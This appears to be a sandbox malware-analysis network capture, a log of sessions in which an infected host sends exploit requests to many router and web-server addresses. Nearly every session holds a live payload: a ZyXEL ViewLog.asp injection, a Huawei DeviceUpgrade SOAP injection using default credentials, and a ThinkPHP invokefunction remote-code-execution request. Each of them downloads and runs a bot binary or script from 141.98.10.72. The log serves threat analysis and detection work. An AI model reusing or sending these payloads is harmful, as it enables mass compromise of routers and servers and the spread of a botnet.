                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.394253016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            738192.168.2.233452031.14.143.1848080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.258323908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.478296995 CET1203INHTTP/1.1 307 Temporary Redirect
                                                            Date: Wed, 14 Feb 2024 08:29:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 152
                                                            Connection: close
                                                            Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                            X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                            X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            739192.168.2.234204031.136.108.2558080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.262581110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.957405090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.301173925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.116836071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:49.492129087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.242631912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:23.535485983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:06.537372112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            740192.168.2.234382685.62.160.1298080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.285660028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            741192.168.2.234838462.29.110.1938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.287440062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            742192.168.2.235981262.29.125.1858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.287532091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            743192.168.2.234296662.29.27.1488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.288762093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            744192.168.2.235136894.122.195.518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.288846016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            745192.168.2.2343448113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.511667013 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:23Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            746192.168.2.2350032197.214.103.17437215
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.586860895 CET814OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            747192.168.2.2343506113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.249623060 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:24Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            748192.168.2.2354980107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.440432072 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:42Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            749192.168.2.234386295.217.232.9180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.519027948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:41.201351881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:41.422019005 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            750192.168.2.234037895.165.192.20680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.530704975 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:40.784539938 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:29:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            751192.168.2.234980495.86.103.9480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.535639048 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            752192.168.2.236050295.86.119.22080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.536814928 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            753192.168.2.235616895.9.91.680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.540498018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            754192.168.2.234497494.123.250.2258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.810971975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            755192.168.2.234459288.221.37.5380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.979446888 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
